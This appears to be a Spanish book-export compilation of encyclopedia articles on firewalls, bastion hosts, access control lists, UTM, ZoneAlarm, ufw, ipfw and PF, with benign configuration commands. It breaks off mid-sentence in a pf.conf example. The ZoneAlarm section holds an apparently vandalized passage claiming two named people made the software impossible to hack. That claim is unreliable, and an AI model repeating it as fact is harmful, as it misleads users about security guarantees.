Durante 1989 y 1990, tres colegas de los laboratorios AT&T Bell, Dave Presetto, Janardan Sharma, y Nigam Kshitij, desarrollaron la segunda generacin de servidores de seguridad. Esta segunda generacin de cortafuegos tiene en cuenta, adems, la colocacin de cada paquete individual dentro de una serie de paquetes. Esta tecnologa se conoce generalmente como la inspeccin de estado de paquetes, ya que mantiene registros de todas las conexiones que pasan por el cortafuegos, siendo capaz de determinar si un paquete indica el inicio de una nueva conexin, es parte de una conexin existente, o es un paquete errneo. Este tipo de cortafuegos pueden ayudar a prevenir ataques contra conexiones en curso o ciertos ataques de denegacin de servicio.

Tercera generacin - cortafuegos de aplicacin


Son aquellos que actan sobre la capa de aplicacin del modelo OSI. La clave de un cortafuegos de aplicacin es que puede entender ciertas aplicaciones y protocolos (por ejemplo: protocolo de transferencia de ficheros, DNS o navegacin web), y permite detectar si un protocolo no deseado se col a travs de un puerto no estndar o si se est abusando de un protocolo de forma perjudicial. Un cortafuegos de aplicacin es mucho ms seguro y fiable cuando se compara con un cortafuegos de filtrado de paquetes, ya que repercute en las siete capas del modelo de referencia OSI. En esencia es similar a un cortafuegos de filtrado de paquetes, con la diferencia de que tambin podemos filtrar el contenido del paquete. El mejor ejemplo de cortafuegos de aplicacin es ISA (Internet Security and Acceleration). Un cortafuegos de aplicacin puede filtrar protocolos de capas superiores tales como FTP, TELNET, DNS, DHCP, HTTP, TCP, UDP y TFTP (GSS). Por ejemplo, si una organizacin quiere bloquear toda la informacin relacionada con una palabra en concreto, puede habilitarse el filtrado de contenido para bloquear esa palabra en particular. No obstante, los cortafuegos de aplicacin resultan ms lentos que los de estado.

Cortafuegos (informtica)

41

Acontecimientos posteriores
En 1992, Bob Braden y DeSchon Annette, de la Universidad del Sur de California (USC), dan forma al concepto de cortafuegos. Su producto, conocido como "Visas", fue el primer sistema con una interfaz grfica con colores e iconos, fcilmente implementable y compatible con sistemas operativos como Windows de Microsoft o MacOS de Apple.[citarequerida] En 1994, una compaa israel llamada Check Point Software Technologies lo patent como software denominndolo FireWall-1. La funcionalidad existente de inspeccin profunda de paquetes en los actuales cortafuegos puede ser compartida por los sistemas de prevencin de intrusiones (IPS). Actualmente, el Grupo de Trabajo de Comunicacin Middlebox de la Internet Engineering Task Force (IETF) est trabajando en la estandarizacin de protocolos para la gestin de cortafuegos.[citarequerida] Otro de los ejes de desarrollo consiste en integrar la identidad de los usuarios dentro del conjunto de reglas del cortafuegos. Algunos cortafuegos proporcionan caractersticas tales como unir a las identidades de usuario con las direcciones IP o MAC. Otros, como el cortafuegos NuFW, proporcionan caractersticas de identificacin real solicitando la firma del usuario para cada conexin.[citarequerida]

Tipos de cortafuegos
Nivel de aplicacin de pasarela
Aplica mecanismos de seguridad para aplicaciones especficas, tales como servidores FTP y Telnet. Esto es muy eficaz, pero puede imponer una degradacin del rendimiento.

Circuito a nivel de pasarela


Aplica mecanismos de seguridad cuando una conexin TCP o UDP es establecida. Una vez que la conexin se ha hecho, los paquetes pueden fluir entre los anfitriones sin ms control. Permite el establecimiento de una sesin que se origine desde una zona de mayor seguridad hacia una zona de menor seguridad.

Cortafuegos de capa de red o de filtrado de paquetes


Funciona a nivel de red (capa 3 del modelo OSI, capa 2 del stack de protocolos TCP/IP) como filtro de paquetes IP. A este nivel se pueden realizar filtros segn los distintos campos de los paquetes IP: direccin IP origen, direccin IP destino. A menudo en este tipo de cortafuegos se permiten filtrados segn campos de nivel de transporte (capa 3 TCP/IP, capa 4 Modelo OSI), como el puerto origen y destino, o a nivel de enlace de datos (no existe en TCP/IP, capa 2 Modelo OSI) como la direccin MAC.

Cortafuegos de capa de aplicacin


Trabaja en el nivel de aplicacin (capa 7 del modelo OSI), de manera que los filtrados se pueden adaptar a caractersticas propias de los protocolos de este nivel. Por ejemplo, si trata de trfico HTTP, se pueden realizar filtrados segn la URL a la que se est intentando acceder, e incluso puede aplicar reglas en funcin de los propios valores de los parmetros que aparezcan en un formulario web. Un cortafuegos a nivel 7 de trfico HTTP suele denominarse proxy, y permite que los ordenadores de una organizacin entren a Internet de una forma controlada. Un proxy oculta de manera eficaz las verdaderas direcciones de red.

Cortafuegos (informtica)

42

Cortafuegos personal
Es un caso particular de cortafuegos que se instala como software en un ordenador, filtrando las comunicaciones entre dicho ordenador y el resto de la red. Se usa por tanto, a nivel personal.

Ventajas de un cortafuegos
Bloquea el acceso a personas y/o aplicaciones no autorizadas a redes privadas.

Limitaciones de un cortafuegos
Las limitaciones se desprenden de la misma definicin del cortafuegos: filtro de trfico. Cualquier tipo de ataque informtico que use trfico aceptado por el cortafuegos (por usar puertos TCP abiertos expresamente, por ejemplo) o que sencillamente no use la red, seguir constituyendo una amenaza. La siguiente lista muestra algunos de estos riesgos: Un cortafuegos no puede proteger contra aquellos ataques cuyo trfico no pase a travs de l. El cortafuegos no puede proteger de las amenazas a las que est sometido por ataques internos o usuarios negligentes. El cortafuegos no puede prohibir a espas corporativos copiar datos sensibles en medios fsicos de almacenamiento (discos, memorias, etc.) y sustraerlas del edificio. El cortafuegos no puede proteger contra los ataques de ingeniera social. El cortafuegos no puede proteger contra los ataques posibles a la red interna por virus informticos a travs de archivos y software. La solucin real est en que la organizacin debe ser consciente en instalar software antivirus en cada mquina para protegerse de los virus que llegan por cualquier medio de almacenamiento u otra fuente. El cortafuegos no protege de los fallos de seguridad de los servicios y protocolos cuyo trfico est permitido. Hay que configurar correctamente y cuidar la seguridad de los servicios que se publiquen en Internet.

Polticas del cortafuegos


Hay dos polticas bsicas en la configuracin de un cortafuegos que cambian radicalmente la filosofa fundamental de la seguridad en la organizacin: Poltica restrictiva: Se deniega todo el trfico excepto el que est explcitamente permitido. El cortafuegos obstruye todo el trfico y hay que habilitar expresamente el trfico de los servicios que se necesiten. Esta aproximacin es la que suelen utilizar la empresas y organismos gubernamentales. Poltica permisiva: Se permite todo el trfico excepto el que est explcitamente denegado. Cada servicio potencialmente peligroso necesitar ser aislado bsicamente caso por caso, mientras que el resto del trfico no ser filtrado. Esta aproximacin la suelen utilizar universidades, centros de investigacin y servicios pblicos de acceso a Internet. La poltica restrictiva es la ms segura, ya que es ms difcil permitir por error trfico potencialmente peligroso, mientras que en la poltica permisiva es posible que no se haya contemplado algn caso de trfico peligroso y sea permitido por omisin.

Cortafuegos (informtica)

43

Referencias
[1] [2] [4] [5] [6] (http:/ / ocw. kfupm. edu. sa/ user062/ CSE55101/ firewall. pdf) Firewalls by Dr.Talal Alkharobi RFC 1135 The Helminthiasis of the Internet (http:/ / tools. ietf. org/ html/ rfc1135) http:/ / www. wanredundancy. org/ resources/ firewall/ network-layer-firewall Network Layer Firewall http:/ / www. skullbox. net/ tcpudp. php TCP vs. UDP por Erik Rodriguez (en ingls) William R. Cheswick, Steven M. Bellovin, Aviel D. Rubin (2003). " Google Books Link (http:/ / books. google. com/ books?id=_ZqIh0IbcrgC& lpg=PA142& dq=Firewalls and Internet Security, by Cheswick et al. & pg=PA176#v=onepage& q=Firewalls and Internet Security, by Cheswick et al. & f=false)". Firewalls and Internet security: repelling the wily hacker

Enlaces externos
Request for Comment 2979 - Comportamiento y requerimientos para los cortafuegos de Internet (http://www. ietf.org/rfc/rfc2979.txt) (en ingls) Firewalls: Seguridad en Internet - Comparativa (http://www.e-sort.net/blog/wp-content/uploads/2012/06/ FireWalls_Armando_Orera_Gracia_Infor_-Pro_2012_COLGAR.pdf) (PDF)

Bastion host
Un bastin host (bastion sin tilde por ser ingls, pronnciese bstion) es una aplicacin que se localiza en un server con el fin de ofrecer seguridad a la red interna, por lo que ha sido especialmente configurado para la recepcin de ataques, generalmente provee un solo servicio (como por ejemplo un servidor proxy).

Definicin
Histricamente, se le llamaba Bastiones a las altas partes fortificadas de los castillos medievales; puntos que cubran reas crticas de defensa en caso de invasin, usualmente teniendo murallas muy fortificadas, salas para alojar tropas, y armas de ataque a corta distancia como ollas de aceite hirviendo para alejar a los invasores cuando ya estn por penetrar al castillo. Haciendo una analoga, un bastin host es un sistema identificado por el administrador de firewall como un punto crtico en la seguridad de la red. Generalmente, los bastion host tendrn cierto grado de atencin extra para configurar y disear su seguridad, pudiendo tener software modificado para asegurar su buen desempeo.[1]

Diseo
A diferencia del filtro realizado a travs de un router, que permite o no el flujo directo de paquetes desde el interior al exterior de una red, los bastin host (tambin llamados en ingls application-level gateways) permiten un flujo de informacin pero no un flujo de paquetes, lo que permite una mayor seguridad de las aplicaciones del host. El diseo del bastin consiste en decidir qu servicios ste incluir. Se podra tener un servicio diferente por host, pero esto involucrara un costo muy elevado, pero en caso de que se pueda abordar, se podran llegar a tener mltiples bastin host para mantener seguros mltiples puntos de ataque. Definida la cantidad de bastin hosts, se debe ahora analizar que se instalar en cada uno de ellos, para esto se proponen distintas estrategias:[2] Que la plataforma de hardware del bastin host ejecute una versin segura de su sistema operativo, diseado especficamente para proteger al sistema operativo de sus vulnerabilidades y asegurar la integridad del cortafuegos. Instalar slo los servicios que se consideren esenciales. La razn de esto es que si el servicio no est instalado, ste no puede ser atacado. En general, una limitada cantidad de aplicaciones proxy son instaladas en un bastion host.

Bastion host El bastin host podra requerir autentificacin adicional antes de que un usuario ingrese a sus servicios. En caso de alojar un proxy, este puede tener variadas configuraciones que ayuden a la seguridad del bastion host, tales como: configurados para soportar slo un subconjunto de aplicaciones, permitiendo el acceso a determinados hosts y/o proveyendo toda la informacin de los clientes que se conecten.

44

Tipos de bastion host


Los bastiones pueden clasificarse en tres tipos: single-homed bastion host, dual-homed bastion host y multihomed bastion host.[3]

Single-homed bastin host


Es un dispositivo con una interfaz nica de red, frecuentemente se utiliza para una puerta de enlace en el nivel de aplicacin. El router externo est configurado para enviar los datos al Bastin Host y los clientes internos enviar los datos de salida al host. Finalmente el host evaluar los datos segn las directrices de seguridad.

Dual-homed bastin host


Es un dispositivo que tiene al menos dos interfaces de red. Sirve como puerta de enlace al nivel de aplicacin y como filtro de paquetes. La ventaja de usar este host es crear un quiebre entre las red externa e interna, lo que permite que todo el trfico de entrada y salida pase por el host. Este host evitar que un atacante intent acceder a un dispositivo interno.

Multihomed bastin host


Un Bastin host interno puede ser clasificado como multihomed. Cuando la poltica de seguridad requiere que todo trfico entrante y salida sea enviado a travs de un servidor proxy, un nuevo servidor proxy debera ser creado para la nueva aplicacin streaming. Cuando se utiliza un bastin host como interno, debe residir dentro de una organizacin de la red interna, en general como puerta de acceso para recibir toda el trfico de un bastin host externo. Lo que agrega un nivel mayor de seguridad.

Aplicaciones
El uso de bastin host puede ser extendible a variados sistemas y servicios: Servidor web. Servidor DNS. Servidor de correo electrnico. Servidor FTP. Servidor proxy. Honeypot. Servidor de una red privada virtual. Deep-secure bastion.

A continuacin se expone un ejemplo de una red donde se utilizan dos bastiones host, como se observa se forma una capa adicional de seguridad entre el Internet y la red interna. Para tener acceso a la red interna, un atacante debe pasar por el router externo, alguno de los bastiones y el router interno. El paso por todas estas etapas como presenta una dificultad para el atacante, es de esperar que por el tiempo que le demore traspasar todas las capas, el administrador de red ya debiese haber reconocido la intrusin y haber tomado una posicin defensiva.[4]

Bastion host

45

Arquitectura usando dos bastion host.

[5]

Referencias Enlaces externos


Libro de Procedimientos de Bastionado (http://www.lulu.com/spotlight/fmunozsantoyo), Francisco Muoz Santoyo (2013)

Lista de control de acceso

46

Lista de control de acceso


Una lista de control de acceso o ACL (del ingls, access control list) es un concepto de seguridad informtica usado para fomentar la separacin de privilegios. Es una forma de determinar los permisos de acceso apropiados a un determinado objeto, dependiendo de ciertos aspectos del proceso que hace el pedido. Las ACL permiten controlar el flujo del trfico en equipos de redes, tales como enrutadores y conmutadores. Su principal objetivo es filtrar trfico, permitiendo o denegando el trfico de red de acuerdo a alguna condicin. Sin embargo, tambin tienen usos adicionales, como por ejemplo, distinguir "trfico interesante" (trfico suficientemente importante como para activar o mantener una conexin) en RDSI.

En redes informticas
En redes informticas, ACL se refiere a una lista de reglas que detallan puertos de servicio o nombres de dominios (de redes) que estn disponibles en un terminal u otro dispositivo de capa de red, cada uno de ellos con una lista de terminales y/o redes que tienen permiso para usar el servicio. Tanto servidores individuales como enrutadores pueden tener ACL de redes. Las listas de control de acceso pueden configurarse generalmente para controlar trfico entrante y saliente y en este contexto son similares a un cortafuegos. Existen dos tipos de listas de control de acceso: Listas fija, no cambia Listas variable, cambia

Edificios
Un Sistema de Control de Accesos, administra el ingreso a reas restringidas, y evita as que personas no autorizadas o indeseables tengan la libertad de acceder a la empresa. As mismo con un Sistema de Control de Accesos se puede tener conocimiento de la asistencia del personal, horarios de ingreso y egreso, y tambin poder tener un control histrico de entradas de personas a todas las reas (para poder tener en cuenta quienes podran ser los posibles responsables de algn siniestro). La manera ms eficiente de controlar los movimientos dentro de la empresa es sectorizar la misma en zonas, que pueden ser departamentos, puertas independientes, distintos pisos, etc. Lo ms prctico es que cada empleado de la empresa tenga determinadas las zonas a las cules tiene acceso. Los sistemas trabajan en red para que todas las filiales de una empresa estn conectadas a un sistema central, y se maneja el acceso a nivel centralizado.

Firestarter

47

Firestarter
Firestarter

Firestarter en GNOME 2.12 Desarrollador Los desarrolladores de Firestarter [1] fs-security.com Informacin general ltima versin estable 1.0.3 29 de enero de 2005 Gnero Sistema operativo Licencia En espaol cortafuegos GNU/Linux GPL

Firestarter es una herramienta de cortafuegos personal libre y de cdigo abierto que usa el sistema (iptables/ipchains) Netfilter incluido en el ncleo Linux. Firestarter posee una interfaz grfica para configurar reglas de cortafuegos y otras opciones. Tambin monitoriza en tiempo real todo el trfico de red del sistema, adems de facilitar el redireccionamiento de puertos, compartir la conexin a internet y el servicio DHCP. Firestarter est licenciado bajo la GNU General Public License.

Enlaces externos
Sitio web de Firestarter [2] Como enviar los logs de firestarter a un archivo con ulog [3]

Referencias
[1] http:/ / www. fs-security. com [2] http:/ / www. fs-security. com/ [3] http:/ / free. okupaweb. com/ punk/ varios/ firestarter-logs-file-ulog-howto-es. html

Unified Threat Management

48

Unified Threat Management


UTM (en ingls: Unified Threat Management) o Gestin Unificada de Amenazas. El trmino fue utilizado por primera vez por Charles Kolodgy, de International Data Corporation (IDC), en 2004. Se utiliza para describir los cortafuegos de red que engloban mltiples funcionalidades en una misma mquina. Algunas de las funcionalidades que puede incluir son las siguientes: - UDP - VPN - Antispam - Antiphishing - Antispyware - Filtro de contenidos - Antivirus - Deteccin/Prevencin de Intrusos (IDS/IPS) Se trata de cortafuegos a nivel de capa de aplicacin que pueden trabajar de dos modos: - Modo proxy: hacen uso de proxies para procesar y redirigir todo el trfico interno. - Modo Transparente: no redirigen ningn paquete que pase por la lnea, simplemente lo procesan y son capaces de analizar en tiempo real los paquetes. Este modo, como es de suponer, requiere de unas altas prestaciones hardware. Desventajas: Se crea un punto nico de fallo y un cuello de botella, es decir si falla este sistema la organizacin queda desprotegida totalmente. Tiene un coste fijo peridico.[] Ventajas: Se pueden sustituir varios sistemas independientes por uno solo facilitando su gestin.[] UTM es un trmino que se refiere a un firewall de red con mltiples funciones aadidas, trabajando a nivel de aplicacin. Realiza el proceso del trfico a modo de proxy, analizando y dejando pasar el trfico en funcin de la poltica implementada en el dispositivo.

Notas y referencias Enlaces externos


El pasado Febrero de 2007 fue el primer "Roadshow" Europeo de seguridad UTM (http://www.optenet.com/ en/detalles.asp?c=1&idn=29)

RFC 2979

49

RFC 2979
La recomendacin RFC 2979 de la IETF define las caractersticas de comportamiento y requerimientos de interoperabilidad para los cortafuegos de Internet. Plantea dichos requerimientos como un paso inicial necesario para hacer consistente el comportamiento de los cortafuegos en distintas plataformas, de acuerdo con las prcticas aceptadas del protocolo IP.

Enlaces
RFC 2979 - Behavior of and Requirements for Internet Firewalls [1]

Referencias
[1] http:/ / www. ietf. org/ rfc/ rfc2979. txt

ZoneAlarm
ZoneAlarm Desarrollador Check Point [1] www.ZoneAlarm.com Informacin general Lanzamiento inicial 16 de febrero de 2000

ltima versin estable 10.2.081.000 12 de octubre de 2012 Gnero Licencia En espaol Cortafuegos No Libre

ZoneAlarm es un cortafuegos por software producido por Check Point. Incluye un sistema de deteccin de intrusiones entrantes, al igual que la habilidad de controlar que programas pueden crear conexiones salientes esto ltimo no est incluido en el cortafuegos de Windows XP Service Pack 2. En ZoneAlarm, el acceso del programa est controlado por las "zonas" en las cuales se dividen las conexiones de red del ordenador. La "zona de confianza" ("trusted zone") normalmente incluye la red de rea local del usuario y puede compartir recursos tales como ficheros e impresoras, mientras que la "zona de Internet" ("Internet zone") incluye todo lo que no est en la "zona de confianza". El usuario puede especificar que "permisos" (trusted zone client, trusted zone server, Internet zone client, Internet zone server) dar a un programa antes de que intente acceder a Internet (p.e. antes de ejecutarlo por primera vez) o, alternativamente, ZoneAlarm preguntar al usuario que permisos dar al programa en su primer intento de acceso. In 2006, Zone Labs anunci [2] que ZoneAlarm no dara soporte a los sistemas operativos Windows 98 y Me, empezando por la versin 6.5. La compaa dijo que el anunciado fin de la fase de Soporte Extendido de Microsoft (provisin de parches de seguridad esenciales) para Windows 98 y Me fue lo que motiv esta decisin.

ZoneAlarm

50

Versiones
ZoneAlarm - la versin freeware incluye un firewall de red web y local con control de programas salientes y silenciado de puertos ("stealthing"). La versin freeware 6.5 no soporta la hibernacin de Windows y no puede ser desinstalada completamente. p.e. el usuario necesita seguir numerosas instrucciones para eliminar completamente el software. ZoneAlarm Pro - bloqueador de ventanas emergentes, deteccin de hardware, proteccin de identidad, bloqueador de cookies y monitor de procesos ZoneAlarm Antivirus - ZoneAlarm con proteccin antivirus adems de las caractersticas del firewall ZoneAlarm Antispyware - Una versin recortada de ZoneAlarm Pro: tiene todas las caractersticas de ZoneAlarm Pro excepto las de privacidad e identidad. ZoneAlarm Internet Security Suite - Incluye todas las caractersticas de las versiones anteriores, e incluye IMSecure Pro (ver a continuacin) y un filtro antispam elaborado por MailFrontier. IMSecure - Protege a clientes de mensajera instantnea como (AIM, Yahoo!, MSN, ICQ y Trillian) de virus y transmisin accidental de informacin personal. IMSecure viene en dos ediciones, Basic y Pro, la ltima tiene ms opciones de seguridad.

Versiones descontinuadas
ZoneAlarm Plus - Este producto fue descontinuado desde finales de 2004. Esto fue debido a que tena menos caractersticas que el ZoneAlarm Pro pero se vendan casi por el mismo precio. ZoneAlarm Wireless Security - Este producto fue descontinuado desde el 19 de octubre del 2005, porque sus funciones fueron incluidas en todas las versiones de pago de ZoneAlarm desde la versin 6 en adelante.

Version actualizada
Esta version de ZoneAlarm la hace Sergio Cepeda y Gonzalo los cuales lo actualizan y ponen un sistema antihackeo con lo cual no podra ser hackeada la computadora que posea este antivirus. IMSecure - Protege a clientes de mensajera instantnea como (AIM, Yahoo!, MSN, ICQ y Trillian) de virus y transmisin accidental de informacin personal. IMSecure viene en dos ediciones, Basic y Pro, la ltima tiene ms opciones de seguridad.

Crtica
Controversia por el software espa de la versin 6.0
En 2006, James Borck de InfoWorld descubri que ZoneAlarm Security Suite 6.0 continuaba mandando datos cifrados a cuatro servidores incluso despus de que el usuario hubiese desactivado todas las opciones de comunicaciones de ZoneAlarm.[3] Zone Labs public entonces una nota de prensa en su pgina web, dando instrucciones para que los usuarios desactivaran las comunicaciones secretas mientras informaba que no se comparta informacin personal, desmintiendo que el programa debilitara la seguridad.[4] Esta claro que es un programa eficaz y a la vez peligroso.

ZoneAlarm

51

Instalaciones sucias
ZoneAlarm ha sido criticado por no desinstalarse limpiamente usando su propio desinstalador, la nica manera de eliminar ZoneAlarm propiamente despus de la desinstalacin es eliminando manualmente ciertos ficheros, carpetas y entradas del registro, habiendo activado primero la vista de ficheros y carpetas ocultas (en Windows XP y Windows 2000, es necesario tambin activar la vista de ficheros protegidos del sistema operativo).[5]

Referencias
[1] [2] [3] [4] http:/ / www. zonealarm. com/ http:/ / www. zonelabs. com/ store/ includes/ zaSystemRequirements_popup. jsp InfoWorld - ZoneAlarm llama a casa (http:/ / www. infoworld. com/ article/ 06/ 01/ 13/ 73792_03OPcringley_1. html), 23 de junio de 2006 Zone Labs - Como desactivar las comunicaciones del servidor de ZoneAlarm (http:/ / download. zonelabs. com/ bin/ free/ pressReleases/ 2005/ pr_22. html), 24 de junio de 2006 [5] New, easier uninstall instructions 2006-08-29 - Helpful Hints & Links - ZoneAlarm User Forum (http:/ / forum. zonelabs. org/ zonelabs/ board/ message?board. id=AllowAccess& message. id=103)

Enlaces externos
Sitio web oficial de Zone Labs (http://www.zonelabs.com/) Blog oficial de Zone Labs (http://blog.zonelabs.com/) Foro oficial de Zone Labs (http://forum.zonelabs.org/zonelabs) Premios de Zone Labs (http://www.zonelabs.com/store/content/company/aboutUs/awards.jsp) FAQ sobre ZoneAlarm (http://wiki.castlecops.com/ZoneAlarm_FAQ) Historia de las versiones de ZoneAlarm Pro para Windows XP (http://download.zonelabs.com/bin/free/ information/zap/releaseHistory.html) Historia de las versiones de ZoneAlarm Pro para Windows Vista (http://download.zonelabs.com/bin/free/ information/zap/releaseHistory_vista.html) Anlisis de ZoneAlarm Internet Security Suite 6 (http://www.reviewbase.co.uk/reviews/ zonealarm-internet-security-suite-6,id767.html#Reviews) Zone Labs Customer Care: Como desinstalar completamente ZoneAlarm (http://nh2.nohold.net/ noHoldCust25/Prod_1/Articles55646/CompleteUninstallNonNT.html) Versiones antiguas de Zone Alarm (http://www.oldversion.com/program.php?n=zalarm) - Todas las versiones antiguas desde la versin 2.0 hasta la ltima Como abrir los puertos en Zone Alarm Professional (http://www.bleepingcomputer.com/tutorials/tutorial128. html) Como eliminar completamente ZoneAlarm (http://www.nohold.net/noHoldCust25/Prod_1/Articles55646/ CompleteUninstallNonNT.html)

Uncomplicated Firewall

52

Uncomplicated Firewall
Uncomplicated Firewall (ufw) es un cortafuegos diseado para ser de fcil uso desarrollado por Ubuntu. Utiliza la lnea de comandos para configurar las iptables usando un pequeo nmero de comandos simples. Ufw est escrito en python y es un programa para GNU/Linux.

Interface grfica
Gufw es una interface grfica de usuario para el ufw.

Uso de la lnea de comando


Comandos de lnea usados en Uncomplicated Firewall
Funcin Enciende el firewall Apaga el firewall Muestra estatus Muestra estatus detallado Muestra Lista de Reglas Numerada Bloquea todo el trfico de entrada Permite todo el trfico de entrada Bloquea todo el trfico saliente Permite todo el trfico saliente Bloquea elpuerto 22 Comando sudo ufw enable sudo ufw disable sudo ufw status sudo ufw status verbose sudo ufw status numbered Comentario

sudo ufw default deny incoming sudo ufw default allow incoming sudo ufw default deny outgoing sudo ufw default allow outgoing sudo ufw deny port 22

Esto detendr por defecto todo el trfico entrante LAN desde Internet a menos que se especifique lo contrario en una regla Esto permitir por defecto todo el trfico entrante LAN a menos que se especifique lo contrario en una regla Esto detendr por defecto todo el trfico saliente hacia Internet LAN a menos que se especifique lo contrario en una regla Esto permitir por defecto todo el trfico saliente hacia Internet LAN a menos que se especifique lo contrario en una regla Esto detendr a cualquiera en Internet que intente conectarse a dispositivos en el LAN usando SSH Esto permitir a cualquiera en Internet conectarse a dispositivos en el LAN usando SSH Esto detendr a la direccin IP 220.60.90.55 conectarse a dispositivos en el LAN usando SSH Esto permitir a la direccin IP 220.60.90.55 conectarse a dispositivos en el LAN usando SSH Esto detendr a cualquiera usando una direccin IP en el rango 220.60.90.1 - 220.60.90.254 conectarse a dispositivos en el LAN usando SSH Esto permitir a cualquiera usando una direccin IP en el rango 220.60.90.1 - 220.60.90.254 conectarse a dispositivos en el LAN usando SSH Esto detendr a cualquiera en Internet usando un DNS buscar dispositivos en el LAN Esto permitir a cualquiera en Internet hacer transacciones DNS sobre dispositivos en el LAN

Permite el puerto 22

sudo ufw allow port 22

Bloquea el puerto 22 solo para una persona especfica

sudo ufw deny from 220.60.90.55 to port 22

Permite el puerto 22 solo para sudo ufw allow from una persona especfica 220.60.90.55 to port 22 Bloquea el puerto 22 solo para una red especfica sudo ufw deny from 220.60.90.0/24 to port 22

Permite el puerto 22 solo para sudo ufw allow from una red especfica 220.60.90.0/24 to port 22

Bloquea el puerto 53 en el UDP Permite el puerto 53 en el UDP

sudo ufw deny port 53

sudo ufw allow port 53

Uncomplicated Firewall

53
sudo ufw allow 2500:5000/tcp Esto permitir a cualquiera en Internet comunicarse a cualquier puerto en el rango 2500 - 5000 en dispositivos en el LAN sudo ufw delete 1 Esto borrar la primera regla en la lista de reglas

Permite un rango de puertos TCP Elimina un nmero de regla

Enlaces externos
(en ingls) ufw [1] - Informacin sobre Uncomplicated Firewall en Ubuntu

Referencias
[1] https:/ / wiki. ubuntu. com/ UbuntuFirewall

Gufw
Gufw

Gufw 0.0.7 corriendo en Ubuntu Desarrollador 'Desarrolladores Gufw' [1] gufw.org Informacin general ltima versin estable 0.20.0[2] 12 de septiembre de 2008 Gnero Sistema operativo Licencia En espaol Cortafuegos GNU/Linux GPL3

Gufw es una interfaz grfica de software libre para ufw (Uncomplicated FireWall), publicado por primera vez en Ubuntu 8.04. Ubuntu Hardy Heron introdujo la herramienta ufw de lnea de comandos que facilitaba la configuracin de las reglas de Iptables. Sin embargo la lnea de comandos de ufw an era muy complicada para la gente. Con Gufw se puede prescindir de la consola, usando el motor de ufw. Es ms sencillo activar/desactivar el cortafuegos, aadir reglas que nieguen/permitan/limiten puertos/ips o borrar conjuntos de reglas creadas. Permite configurar el nivel de registro de ufw, y mantiene su propio registro de operaciones realizadas. Es ideal para personas

Gufw sin conocimientos del funcionamiento de un cortafuegos.

54

Implementacin
Est hecho en lenguaje Python, junto con Glade para la interface grfica.

Instalacin
Gufw est en los repositorios oficiales. La instalacin se hace instalando el paquete gufw desde los repositorios. Es necesario el uso de Ubuntu 8.04 Hardy Heron o superior, que es donde se incluye por primera vez ufw.

Gestin de recursos
Gufw hace uso de Launchpad para la gestin de los recursos. En ella se puede hacer un seguimiento o aviso de bugs, roadmap y traduccin a otros idiomas.

Referencias
[1] http:/ / gufw. org/ [2] http:/ / gufw. org/ - Web oficial de Gufw

Enlaces externos
Web oficial (http://gufw.org) Cdigo fuente y recursos (https://launchpad.net/gui-ufw) Documentacin Oficial (en) (https://help.ubuntu.com/community/Gufw/) Documentacin Oficial (es) (https://help.ubuntu.com/community/Gufw/ES)

Ipfw

55

Ipfw
ipfw es un programa de cortafuegos (en ingls, firewall) propio de los sistemas UNIX, principalmente FreeBSD y Mac OS X. Fue escrito y es mantenido por los programadores del proyecto FreeBSD. Su sintaxis permite la utilizacin de funcionalidades avanzadas y as permitir a los usuarios profesionales satisfacer requerimientos avanzados. Tambin puede ser usado como un mdulo que se puede cargar en el ncleo (en ingls, kernel) o incorporarse directamente en el mismo. La utilizacin del mismo como un mdulo cargable en el ncleo est altamente recomendado.[citarequerida]

Enlaces externos
Manual de usuario de ipfw - FreeBSD [1]

Referencias
[1] http:/ / www. freebsd. org/ doc/ en/ books/ handbook/ firewalls-ipfw. html

PF (software)
PF (Packet Filter) es el filtro de paquetes o cortafuegos basado en configuracin dinmica (stateful rules) escrito originalmente por Daniel Hartmeier actualmente desarrollado y mantenido por el equipo de desarrollo de OpenBSD. Es funcionalmente comparable a otras soluciones de filtrado de pquetes, como iptables, ipfw e ipfilter. Fue publicado a finales de 2001, en OpenBSD 3.0, como reemplazo de IPFilter, el filtro de paquetes de Darren Reed, debido a algunos problemas con la licencia de dicho software, ya que su autor tena que dar autorizacin a los desarrolladores de OpenBSD para modificar el cdigo. Theo de Raadt, el lder de OpenBSD, dijo cuando se elimin el IPFilter que "el software que OpenBSD utiliza y distribuye debe ser libre para todos (tanto usuarios como compaas), para cualquier fin que quiera drsele, incluyendo su modificacin, uso". Debido a la incomodidad del equipo de OpenBSD con la licencia de Reed, se opt por reemplazar todo el paquete antes que perder ms tiempo intentando negociar la cuestin. PF se ha desarrollado desde entonces muy rpidamente, y en OpenBSD 3.8 ya tena mucha ventaja sobre otras opciones de cortafuegos. La sintaxis de filtrado es muy similar a la de IPFilter, aunque se modific para hacerla ms clara y legible. La traduccin de direcciones de red (NAT) y calidad del servicio (QoS) se integraron perfectamente en PF, para permitir mayor flexibilidad. Se alcanz el QoS integrando colas alternativas (ALTQ) en el propio PF. PF puede utilizarse para montar dispositivos cortafuegos de gran flexibilidad, ya que incluye caractersticas de Alta Disponibilidad, como pfsync y un protocolo de redundancia para direcciones comunes (CARP), authpf (Identificador de sesin), un proxy ftp y otros extras relacionados con PF.

PF (software)

56

Portes
PF se desarrolla como parte del sistema base de OpenBSD. Pese a ello, ha sido portado con xito a otros sistemas. FreeBSD lo fue adoptando paulatinamente, primero como paquete y desde la versin FreeBSD 5.3 como una de los tres subsistemas de filtrado que ofrece el ncleo. Existe una versin de FreeBSD, denominada pfSense, que incluye una sofisticada interfaz grfica para editar relgas de PF. Tambin se ha portado PF a NetBSD 3.0 por itojun y aparece en DragonFlyBSD desde la versin 1.2. Pese a algunos intentos, PF no ha podido ser portado con xito a Linux, probablemente por las profundas diferencias entre la pila de red de los ncleos BSD y el de Linux.

Comandos y opciones
pfctl -e -> activa PF pfctl -d -> desactiva PF pfctl -f <archivo> -> si no aparecen errores de sintaxis en <archivo>, se cargan reglas nuevas en PF

Ejemplo de un archivo pf.conf


## Macros # Interfaz interna (conectada a la red local). int_if="xl0" ## Opciones # Se ajusta la poltica por defecto para devolver RSTs o ICMPs para trfico bloqueado set block-policy return # Ignorar la interfaz loopback por completo. set skip on lo0 ## Reglas de reenrutado # El trfico NAT en la interfaz englobada dentro del grupo por defecto de interfaz egress # (al que se asigna la interfaz de salida de la ruta por defecto) desde la red local nat on egress from $int_if:network to any -> (egress) ## Reglas de filtrado # Regla de denegacin por defecto, todos los paquetes bloqueados registrados en log block log all # Pasa todo el trfico desde y hacia la red local, utilizando quick para que # despus no se evalen las reglas para este caso. Algunas reglas restringirn el # trfico local mucho ms. pass quick on $int_if all # Permite la salida de todo el trfico, manteniendo el estado para que las respuestas # pasen automticamente. Muchas reglas tendrn aqu ms reglas, restringiendo el

